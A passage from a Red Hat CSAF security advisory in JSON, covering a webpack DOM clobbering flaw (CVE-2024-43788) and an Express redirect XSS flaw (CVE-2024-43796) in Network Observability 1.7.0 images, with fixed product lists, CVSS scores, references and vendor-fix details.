"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
